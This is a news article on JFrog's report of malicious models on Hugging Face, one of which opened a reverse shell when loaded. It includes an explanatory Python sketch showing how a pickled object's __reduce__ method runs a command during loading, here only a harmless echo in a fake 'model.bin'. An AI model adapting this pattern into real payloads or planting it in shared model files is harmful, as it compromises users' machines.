Hugging Face, the GitHub of AI, hosted code that backdoored user devices
Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that's a likely harbinger of what's to come.
In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models, all of which went undetected by Hugging Face, appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were "truly malicious" in that they performed actions that actually compromised the users' security when loaded.
Full control of user devices
One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user's device. When JFrog researchers loaded the model into a lab machine, the submission did indeed open a reverse shell but took no further action.
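The excerpt doesn't spell out how merely loading a model can hand over a machine, so here is a minimal sketch of the general technique, assuming a pickle-based model format (which many PyTorch weight files use): Python's pickle serialization lets an object define a __reduce__ method, and whatever call it returns is executed during deserialization. The file name and command below are placeholders and the payload is deliberately harmless; a real payload would open a reverse shell as described above.

```python
import os
import pickle

# Illustration only: how deserializing an untrusted, pickle-based model file can
# execute attacker-chosen code. Real payloads in incidents like this spawn a
# reverse shell; here the command is a harmless placeholder.
class Payload:
    def __reduce__(self):
        # Whatever call is returned here runs during pickle.load(),
        # before the caller ever sees a model object.
        return (os.system, ("echo 'arbitrary code ran on model load'",))

# Attacker side: serialize the payload into what looks like a weights file.
with open("model.bin", "wb") as f:
    pickle.dump(Payload(), f)

# Victim side: loading the "model" with a pickle-based loader runs the command
# with the user's privileges -- no inference or further interaction required.
with open("model.bin", "rb") as f:
    pickle.load(f)
```

The upshot is that loading untrusted model weights in such formats is equivalent to running untrusted code, which is why a single load in JFrog's lab was enough to trigger the reverse shell.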